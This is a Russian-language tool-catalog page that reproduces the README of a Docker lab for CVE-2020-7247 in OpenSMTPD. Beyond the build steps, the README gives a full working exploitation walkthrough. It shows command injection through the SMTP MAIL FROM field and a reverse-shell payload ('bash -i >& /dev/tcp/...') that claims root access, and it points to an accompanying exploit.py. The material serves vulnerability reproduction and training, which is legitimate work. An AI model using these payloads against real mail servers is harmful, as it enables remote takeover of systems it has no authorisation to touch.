Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-7247-reproducer — Среда на основе Docker для воспроизведения CVE-2020-7247 (OpenSMTPD) с Python-эксплойтом для выполнения произвольных команд и обратной оболочки через специально сформированное поле SMTP MAIL FROM. | Kitploit
Инструменты/GitHubGitHub/minhluannguyen/cve-2020-7247-reproducer
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubminhluannguyen/cve-2020-7247-reproducer

CVE-2020-7247-reproducer

Среда на основе Docker для воспроизведения CVE-2020-7247 (OpenSMTPD) с Python-эксплойтом для выполнения произвольных команд и обратной оболочки через специально сформированное поле SMTP MAIL FROM.

Репозиторий
1141 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-7247 (OpenSMTPD)

Информация

Этот репозиторий содержит необходимые файлы для создания Docker-образа с уязвимой средой OpenSMTPD (6.6.1p1). Уязвимость позволяет злоумышленнику выполнять произвольные команды через специально сформированную SMTP-сессию, а именно в поле MAIL FROM.

Использование

  1. Создайте Docker-образ (на базе Debian):
docker build -t opensmtpd-vuln -f Dockerfile .
docker run -it --rm --name opensmtpd-vuln-test opensmtpd-vuln /bin/bash
smtpd -dv
  1. Создайте Nix-образ:
nix-build opensmtpd-vuln.nix
docker load < result
docker run -it --rm opensmtpd-vuln-nix /bin/bash
smtpd -dv

Эксплуатация

  1. Эксплуатируйте уязвимость:

3.1. Выполнение произвольных команд:

$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;touch secret.txt;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

Hello Bonjour Xin chào
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

3.2. Получение обратного шелла:

Настройте слушатель:

nc -lnvp 8080

Запустите скрипт exploit.py (в другом терминале):

python3 exploit.py

Или сделайте это вручную:

$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
sh -c 'echo "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1" | bash'
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

Теперь у вас должна быть оболочка от имени root на хост-машине.

Ссылки

  • OpenSMTPD
  • NVD
Скачать инструмент